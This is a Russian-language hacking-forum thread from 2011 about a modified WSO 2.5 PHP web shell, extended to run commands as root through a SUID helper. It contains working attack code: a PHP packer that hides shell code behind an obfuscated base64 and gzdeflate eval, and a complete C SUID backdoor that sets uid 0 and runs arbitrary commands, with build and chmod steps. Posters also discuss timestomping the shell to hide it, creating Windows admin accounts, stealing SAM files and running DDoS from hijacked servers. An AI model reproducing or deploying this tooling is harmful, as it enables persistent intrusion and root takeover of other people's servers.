WSO 2.5 Modified

Discussion in 'Избранное' started by randman, 6 Aug 2011.

  1. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,372
    Likes Received:
    604
    Reputations:
    1,101
    WSO 2.5 Suid Modified
    Небезизвестный шелл WSO с добавлением модуля для работы с Suid'никами.
    Модификация изначально писалась под собственные нужды, но решил её выложить, так как данная модификация может пригодиться другим пользователям.

    На данный момент большинство пользуется этой наработкой: http://cyberguru007.blogspot.com/2011/07/wso.html
    Но в ней очень много больших минусов :( .

    Модификация:
    • Шелл находиться исключительно в одном файле, не требуется создание нескольких файлов.
    • Путь к Suid'нику и пароль к нему не прописан в файле - его можно указать прямо в шелле и менять не модифицируя исходный код.
    • Вся необходимая информация храниться в COOKIE, при просмотре коде невозможно определить местоположение суидника.
    • Шелл защищён паролем - после ввода пароля вы получаете обычный доступ, суидник нужно указать отдельно.
    • Исправлены глюки при Upload'е, изменении настроек - теперь можно загружать файлы, менять кодировку, AJAX режим можно не переключаюсь к обычной работе.
    • Присутствует возможность проверки работоспособности суидника до подключения шелла.
    • Передача данных происходит через встроенную функцию wsoEx.

    Скрин:
    [​IMG]
    [​IMG]

    Данная утилита предоставляет веб-интерфейс для удаленной работы c операционной системой и ее службами/демонами.
    Использование данного продукта в незаконных целях грозит уголовной ответственностью.

    Код в аттаче . Модификация писалась для личного использования, что возможны глюки.

    Пароль - root.
     

    Attached Files:

    • wso2.zip
      File size:
      37.2 KB
      Views:
      3,280
    #1 randman, 6 Aug 2011
    Last edited: 4 Nov 2011
    nitupme, afonn, ClayFox and 21 others like this.
  2. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,071
    Likes Received:
    530
    Reputations:
    934
    Сделай еще в запакованном виде ;)
     
    _________________________
    1 person likes this.
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,286
    Likes Received:
    1,139
    Reputations:
    886
    имхо и без этого можно было обойтись, просто немного модифицируя wsoEx

    хотя, посмотрим.. :)

    любой труд нужно оценить
     
    _________________________
  4. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,372
    Likes Received:
    604
    Reputations:
    1,101
    Скачать запакованную версию: http://zalil.ru/31520955
    Если кому то нужно добавить ещё некоторые возможности - пишите, сделаю.

    UDP:
    Под рукой нет винды :(
     
    #4 randman, 7 Aug 2011
    Last edited: 7 Aug 2011
  5. C-r-A-c-K

    C-r-A-c-K New Member

    Joined:
    28 May 2011
    Messages:
    45
    Likes Received:
    2
    Reputations:
    1
    сделай поддержку WIN
    вкладку, где элементарным нажатием клавиши, можно было создать админа с правами на удаленное подключение.
    кнопку на скачивание SAM файла
    и т.п. для ВЫНей.

    чтобы уже совсем облениться и не писать вручную net user /ADD =)))))))
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,286
    Likes Received:
    1,139
    Reputations:
    886
    отправка GET/POST запросов, с поправкой хидера :)

    реализовать думаю лучше через сокеты, не везде есть курл
     
    _________________________
  7. WTSBugzoff

    WTSBugzoff New Member

    Joined:
    23 Jun 2011
    Messages:
    86
    Likes Received:
    2
    Reputations:
    0
    как суидник добавлять?
     
  8. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    624
    Likes Received:
    203
    Reputations:
    293
    Например DDOS из армии шеллов)))
    А так вещь вообще действительно полезная, например для анонимной работы с дырами на других сайтах и тд...
     
    1 person likes this.
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,286
    Likes Received:
    1,139
    Reputations:
    886
    я вот тока заметил

    а что означает слово Modificed?

    есть слова Modified, и Modificated

    а вот чо значит modificed, я не понял :rolleyes:
     
    _________________________
    1 person likes this.
  10. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,372
    Likes Received:
    604
    Reputations:
    1,101
    Дополню: Шелл должен иметь как можно больше возможностей, и в тоже время иметь компактный размер. добавлять всё что не попадает под эту категорию не надо.
    Всё что считаю нужным добавлю как будет время.

    Тема перенесена в Уязвимости по моей просьбе.
     
    #10 randman, 10 Aug 2011
    Last edited: 28 Aug 2011
  11. Chrome~

    Chrome~ Elder - Старейшина

    Joined:
    13 Dec 2008
    Messages:
    1,012
    Likes Received:
    162
    Reputations:
    27
    Я делал это. Выложу свой вариант, может пригодится. Шелл тачит себя датой изменения соседнего файла, а если файла нету, то датой изменения соседней директории. Потом находит в директории шелла время модификации, которое произошло максимально недавно, и тачит директорию этой датой.

    Только это сделано в оригинальном WSO 2.5, а не в модификации из первого поста.
    Code:
    http://www.sendspace.com/file/ik9e02
    Запускается нажатием на Magic Touch в менюшке, сам код лежит в функции actionMagicTouch.
     
    1 person likes this.
  12. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,372
    Likes Received:
    604
    Reputations:
    1,101
    PHP:
    <?php
    $header 
    '<?php 
    $auth_pass = "63a9f0ea7bb98050796b649e85481845";
    $color = "#df5";
    $default_action = \'FilesMan\';
    $default_use_ajax = true;
    $default_charset = \'Windows-1251\';
    preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\''
    ;

    $footer '\'\x29\x29\x29\x3B",".");?>';

    $content php_strip_whitespace('in.txt');
    $content trim(preg_replace('/<\?(php)?/'''$content));
    echo 
    $header base64_encode(gzdeflate($content9)) . $footer
     
  13. Falknat

    Falknat Member

    Joined:
    23 Jul 2011
    Messages:
    49
    Likes Received:
    5
    Reputations:
    0
    При использовании Suid на FreeBSP возникает ошибка Query did not return anything :(
    Так же при скачивании файлов с данной модификации, так же возникают ошибки :(
     
    1 person likes this.
  14. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,372
    Likes Received:
    604
    Reputations:
    1,101
    Query did not return anything - Эта ошибка возникает когда функции system, exec(Добавил, поскольку раньше в таком случае ничего не возвращалось)... Запрещены или ничего не возвращают. Проверьте, работают ли они.

    Если да - будем разбираться.
     
    1 person likes this.
  15. Falknat

    Falknat Member

    Joined:
    23 Jul 2011
    Messages:
    49
    Likes Received:
    5
    Reputations:
    0
    Они работают, но всё ровно возникает ошибка при использовании Suid.

    из phpinfo видно что работают:
    Disabled PHP Functions: none

    [​IMG]

    После нажатия на кнопку YES, вылетает эта ошибка :(
     
    #15 Falknat, 28 Aug 2011
    Last edited: 28 Aug 2011
  16. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,372
    Likes Received:
    604
    Reputations:
    1,101
    Возможно не найден php интерпретатор, попробуй выполнить в консоли:
    Работать будет/не будет - Пиши в ПМ.
     
  17. Falknat

    Falknat Member

    Joined:
    23 Jul 2011
    Messages:
    49
    Likes Received:
    5
    Reputations:
    0
    А у вас есть ICQ или какой либо контакт? За доработку скрипта готов буду заплатить...
     
    1 person likes this.
  18. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,372
    Likes Received:
    604
    Reputations:
    1,101
    Платно не работаю. Доработанный скрипт прикрепил в первом посте. Теперь существует возможность указать путь к php интерпретатору.
     
  19. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,709
    Likes Received:
    405
    Reputations:
    196
    Выложили бы сам суидник еще.
     
  20. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    1,079
    Likes Received:
    527
    Reputations:
    204
    Code:
    #include <stdio.h>
    #include <stdlib.h>
    main(int argc, char *argv[])
    {
    if(argc == 3){
    if(strcmp(argv[1],"cool_hack") == 0){
    setgid(0);
    setuid(0);
    system(argv[2]);
    }
    }
    return 0;
    }
    
    
    Using: ./suid cool_hack id
    [path] [password] [command]

    Пароль, разумеется можно изменить. В сурсе видно где ;)
    Скомпилируй (хоть на том же шелле с gcc) и используй.
    Ну и, разумеется, не забывай уже бинарнику добавлять suid-бит (к примеру chmod 4751 suidfilename).

    P.S.:
    Скомпилированный суидник с паролем 112s233: http://rghost.ru/19777451
     
    #20 Tigger, 29 Aug 2011
    Last edited: 29 Aug 2011
    2 people like this.